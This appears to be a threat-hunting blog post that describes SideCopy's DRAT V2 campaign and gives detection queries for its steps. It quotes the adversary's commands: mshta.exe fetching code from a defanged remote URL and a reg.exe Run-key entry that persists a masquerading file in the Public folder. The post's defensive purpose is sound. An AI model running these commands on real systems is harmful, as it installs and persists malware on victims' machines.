177. Hunting for SideCopy's DRAT V2
Hello everyone!
Let's look at another example of leveraging ClickFix technique. This time it's SideCopy - a sub-cluster of Transparent Tribe. Recently Recorded Future reported on a new version of DRAT - let's look at some detection and hunting opportunities.
First of all, the adversary abuses mshta.exe:
C:\Windows\System32\mshta.exe hxxps://trade4wealth[.]in/admin/assets/css/default/index.php
It's a great candidate for hunting! For example, we can search for mshta.exe executing files from remote servers:
event_type: "processcreatewin"
AND
proc_file_name: "mshta.exe"
AND
cmdline: ("http" OR "https")
Next - it abuses reg.exe to establishes persistence for DRAT:
REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Edgre" /t REG_SZ /F /D "cmd /C start C:\Users\Public\USOShared-1de48789-1285\zuidrt.pdf
Here we can hunt for adding files located under %PUBLIC% to the Run key, for example:
event_type: "processcreatewin"
AND
proc_file_name: "reg.exe"
AND
cmdline: ("add" AND "run" AND "public")
Finally, the adversary executes cmd.exe to run a masquaraded malicious file from %PUBLIC%, and this is another hunting opportunity:
event_type: "processcreatewin"
AND
proc_file_name: "cmd.exe"
AND
cmdline: ("start" AND "public")
See you tomorrow!
Comments
Post a Comment